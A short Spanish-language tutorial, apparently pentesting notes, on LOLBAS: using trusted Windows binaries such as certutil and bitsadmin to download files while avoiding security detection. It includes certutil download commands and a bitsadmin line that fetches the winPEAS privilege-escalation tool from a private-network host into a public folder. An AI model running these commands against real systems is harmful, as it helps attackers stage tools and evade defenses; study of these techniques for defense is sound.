Utilizando LOLBAS

LOLBAS (Living Off the Land Binaries and Scripts) se refiere al uso de herramientas nativas y legítimas del sistema operativo para llevar a cabo actividades maliciosas. Los atacantes utilizan estas herramientas para evitar la detección por parte de las soluciones de seguridad, ya que estas herramientas son de confianza y están firmadas por el sistema operativo. Algunas de las herramientas comunes de LOLBAS en Windows incluyen certutil, bitsadmin, mshta, powershell, entre otras.

Uso de certutil para Descarga de Archivos

certutil es una utilidad de línea de comandos en Windows utilizada principalmente para la administración de certificados, pero también puede ser utilizada para descargar archivos.

Comandos para Descargar Archivos con certutil:

1. Descargar un archivo desde una URL y guardarlo localmente:

   Copiar

   certutil -urlcache -split -f http://example.com/file.txt file.txt

2. Descargar un archivo y guardarlo en un directorio específico:

   Copiar

   certutil -urlcache -split -f http://example.com/file.txt C:\Path\To\Save\file.txt

Uso de bitsadmin para Descarga de Archivos

bitsadmin es una herramienta de línea de comandos para crear, monitorear y completar trabajos de descarga y carga de archivos.

Comandos para Descargar Archivos con bitsadmin:

bitsadmin /transfer myDownloadJob /download /priority normal http://192.168.45.165:3000/Tools/winPEASany.exe c:\Users\Public\winpeas.exe